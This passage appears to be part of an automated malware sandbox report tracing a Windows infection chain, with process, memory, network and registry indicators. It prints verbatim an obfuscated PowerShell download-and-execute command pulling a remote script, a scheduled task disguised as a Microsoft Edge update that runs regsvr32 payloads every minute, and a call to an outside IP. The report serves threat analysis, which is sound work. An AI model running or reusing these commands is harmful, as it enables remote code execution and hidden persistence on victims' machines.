Source: C:\Windows\System32\regsvr32.exe TID: 7148	Thread sleep count: 48 > 30
Source: C:\Windows\System32\regsvr32.exe TID: 7148	Thread sleep time: -44272185776902896s >= -30000s

Source: C:\Windows\System32\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Windows\System32\regsvr32.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D2740F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,		4_2_00007FF63D2740F0
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04040F0 memcpy,memcpy,memset,FindFirstFileW,memcpy,GetLastError,FindClose,GetLastError,		18_2_00007FF7F04040F0

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\regsvr32.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	File opened: C:\Users\Default\AppData\Local\Microsoft	Jump to behavior

Source: powershell.exe, 00000003.00000002.1674392136.000001BDDCE79000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: War&Prod_VMware_
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Remove-NetEventVmNetworkAdapter
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Add-NetEventVmNetworkAdapter
Source: OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: DisableGuestVmNetworkConnectivity
Source: utox_x86_x64.exe, 00000008.00000002.2668189874.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000E.00000003.1636300558.000001F9E0750000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: EnableGuestVmNetworkConnectivity
Source: powershell.exe, 00000005.00000002.1553322256.000001F3DC9E9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Get-NetEventVmNetworkAdapter
Source: utox_x86_x64.exe, 00000008.00000002.2668189874.0000000000D3C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000003.00000002.1676638424.000001BDDCFAF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll55

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D221180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,	4_2_00007FF63D221180
Source: C:\Users\Public\ajbs50ul.bat	Code function: 4_2_00007FF63D3FBC00 SetUnhandledExceptionFilter,	4_2_00007FF63D3FBC00
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F03B1180 Sleep,Sleep,SetUnhandledExceptionFilter,malloc,strlen,malloc,memcpy,_initterm,	18_2_00007FF7F03B1180
Source: C:\Windows\System32\rekeywiz.exe	Code function: 18_2_00007FF7F04FDC00 SetUnhandledExceptionFilter,	18_2_00007FF7F04FDC00

Source: C:\Users\Public\ajbs50ul.bat

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\System32\regsvr32.exe

Network Connect: 185.196.9.174 7777

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_5560.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 5560, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualAlloc(IntPtr.Zero, new IntPtr(65536), MEM_COMMIT, 4u)
Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: Marshal.WriteIntPtr(new IntPtr(intPtr.ToInt64() + num), GetProcAddress(moduleHandle, array[i]))
Source: 9.2.regsvr32.exe.2760000.1.raw.unpack, Flutter.cs	Reference to suspicious API methods: VirtualProtect(intPtr, 65536u, 64u, out var _)

Allocates memory in foreign processes

Source: C:\Program Files\Windows Media Player\wmprph.exe

Memory allocated: C:\Windows\System32\dllhost.exe base: 24D91250000 protect: page read and write

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\Public\ajbs50ul.bat

NtWriteFile: Indirect: 0x7FF63D277076

Jump to behavior

Sets debug register (to hijack the execution of another thread)

Source: C:\Windows\System32\regsvr32.exe

Thread register set: 2976 5

Jump to behavior

Writes to foreign memory regions

Source: C:\Program Files\Windows Media Player\wmprph.exe	Memory written: C:\Windows\System32\dllhost.exe base: 24D91250000
Source: C:\Program Files\Windows Media Player\wmprph.exe	Memory written: C:\Windows\System32\dllhost.exe base: 7FF6730814E0

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""W 0""1 $jufn='i'+'e'+''+'X';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).Dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.Replace(''v7i9'',''ttps://'').Replace(''p24'', ''e''))').Replace('wxwl', 't').Replace('gdvi', 'nloadS'))));exit	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\Public\ajbs50ul.bat "C:\Users\Public\ajbs50ul.bat"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\Desktop\utox_x86_x64.exe "C:\Users\user\Desktop\utox_x86_x64.exe"	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C8CCCCC-0448-48C8-C088-8CCCC0000044}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/M08e.ini	Jump to behavior
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Program Files\Windows Media Player\wmprph.exe "C:\Program Files\Windows Media Player\wmprph.exe"	Jump to behavior
Source: C:\Windows\System32\OpenWith.exe	Process created: C:\Windows\System32\rekeywiz.exe "C:\Windows\system32\rekeywiz.exe"	Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{4C0C80C0-8884-4C8C-CCC0-CC80C840C404}' -Description 'Default' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries)"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\regsvr32.exe "regsvr32" /s /i:INSTALL C:\Users\user\AppData/Roaming/Gga6.ini
Source: C:\Program Files\Windows Media Player\wmprph.exe	Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"

Source: unknown	Process created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c p""ow""er""s""h""ell/""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/m08e.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c8ccccc-0448-48c8-c088-8cccc0000044}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/gga6.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c0c80c0-8884-4c8c-ccc0-cc80c840c404}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe p""ow""er""s""h""ell /""w 0""1 $jufn='i'+'e'+''+'x';s""al bx1g $jufn;$ajbs50ul=bx1g(bx1g($($('(new-objecwxwl syswxwlem.newxwl.webc""lienwxwl).dowgdvitring(''hv7i91h982d.bp24mostakp24.spacp24/tp24st.txt''.replace(''v7i9'',''ttps://'').replace(''p24'', ''e''))').replace('wxwl', 't').replace('gdvi', 'nloads'))));exit	Jump to behavior
Source: C:\Users\Public\ajbs50ul.bat	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/m08e.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c8ccccc-0448-48c8-c088-8cccc0000044}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"	Jump to behavior
Source: C:\Windows\System32\rekeywiz.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "register-scheduledtask -action (new-scheduledtaskaction -execute \"regsvr32\" -argument \"/s /i:install c:\users\user\appdata/roaming/gga6.ini\") -trigger (new-scheduledtasktrigger -once -at (get-date).addminutes(1) -repetitioninterval (new-timespan -minutes 1)) -taskname 'microsoftedgeupdatetaskmachineua{4c0c80c0-8884-4c8c-ccc0-cc80c840c404}' -description 'default' -settings (new-scheduledtasksettingsset -allowstartifonbatteries -dontstopifgoingonbatteries)"

Source: C:\Windows\System32\OpenWith.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
